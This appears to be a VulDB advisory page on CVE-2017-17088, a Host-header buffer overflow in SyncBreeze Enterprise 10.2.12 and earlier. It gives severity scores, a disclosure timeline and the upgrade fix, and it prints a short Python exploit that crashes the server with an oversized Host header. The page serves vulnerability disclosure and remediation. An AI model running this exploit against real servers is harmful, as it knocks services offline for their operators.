SyncBreeze Enterprise up to 10.2.12 Server Request Host Header memory corruption

CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.
7.2$0-$5k0.00

Summaryinfo

A vulnerability identified as critical has been detected in SyncBreeze Enterprise up to 10.2.12. This affects an unknown part of the component Server Request Handler. Performing a manipulation as part of Host Header results in memory corruption. This vulnerability is known as CVE-2017-17088. Remote exploitation of the attack is possible. Furthermore, an exploit is available. You should upgrade the affected component.

Detailsinfo

A vulnerability was found in SyncBreeze Enterprise up to 10.2.12. It has been classified as critical. This affects some unknown functionality of the component Server Request Handler. The manipulation as part of a Host Header leads to a memory corruption vulnerability. CWE is classifying the issue as CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This is going to have an impact on confidentiality, integrity, and availability. The summary by CVE is:

The Enterprise version of SyncBreeze 10.2.12 and earlier is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server requests in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service.

The bug was discovered 11/30/2017. The weakness was published 12/19/2017 by Manuel Garcia Cardenas as confirmed mailinglist post (Full-Disclosure). The advisory is shared at seclists.org. The public release has been coordinated with the project team. This vulnerability is uniquely identified as CVE-2017-17088 since 12/01/2017. The exploitability is told to be easy. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. Technical details are unknown but a public exploit is available.

A public exploit has been developed by Manuel Garcia Cardenas in Python and been published before and not just after the advisory. The exploit is shared for download at exploit-db.com. It is declared as highly functional. The vulnerability was handled as a non-public zero-day exploit for at least 6 days. During that time the estimated underground price was around $0-$5k. The code used by the exploit is:

#!/usr/bin/python
import sys, socket
 
host = sys.argv[1]
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: "+"A"*2000+"\r\n\r\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()

Upgrading to version 10.3 eliminates this vulnerability. The upgrade is hosted for download at syncbreeze.com. A possible mitigation has been published before and not just after the disclosure of the vulnerability.

The vulnerability is also documented in the vulnerability database at Exploit-DB (43344). If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Productinfo

Name

Version

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔍
VulDB Reliability: 🔍

CVSSv3info

VulDB Meta Base Score: 7.4
VulDB Meta Temp Score: 7.2

VulDB Base Score: 7.3
VulDB Temp Score: 7.0
VulDB Vector: 🔍
VulDB Reliability: 🔍

NVD Base Score: 7.5
NVD Vector: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍

NVD Base Score: 🔍

Exploitinginfo

Class: Memory corruption
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

Physical: No
Local: No
Remote: Yes

Availability: 🔍
Access: Public
Status: Highly functional
Author: Manuel Garcia Cardenas
Programming Language: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Price Prediction: 🔍
Current Price Estimation: 🔍

0-DayUnlockUnlockUnlockUnlock
TodayUnlockUnlockUnlockUnlock

Exploit-DB: 🔍

Threat Intelligenceinfo

Interest: 🔍
Active Actors: 🔍
Active APT Groups: 🔍

Countermeasuresinfo

Recommended: Upgrade
Status: 🔍

0-Day Time: 🔍

Upgrade: SyncBreeze Enterprise 10.3

Timelineinfo

11/30/2017 🔍
12/01/2017 +1 days 🔍
12/06/2017 +5 days 🔍
12/15/2017 +9 days 🔍
12/15/2017 +0 days 🔍
12/19/2017 +4 days 🔍
12/19/2017 +0 days 🔍
12/20/2017 +1 days 🔍
01/18/2023 +1855 days 🔍

Sourcesinfo

Advisory: 145435
Researcher: Manuel Garcia Cardenas
Status: Confirmed
Coordinated: 🔍

CVE: CVE-2017-17088 (🔍)
GCVE (CVE): GCVE-0-2017-17088
GCVE (VulDB): GCVE-100-110805
scip Labs: https://www.scip.ch/en/?labs.20161013

Entryinfo

Created: 12/20/2017 07:54
Updated: 01/18/2023 11:52
Changes: 12/20/2017 07:54 (72), 12/17/2019 16:36 (1), 01/18/2023 11:52 (4)
Complete: 🔍
Cache ID: 216::103

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Discussion

No comments yet. Languages: en.

Please log in to comment.

Do you know our Splunk app?

Download it now for free!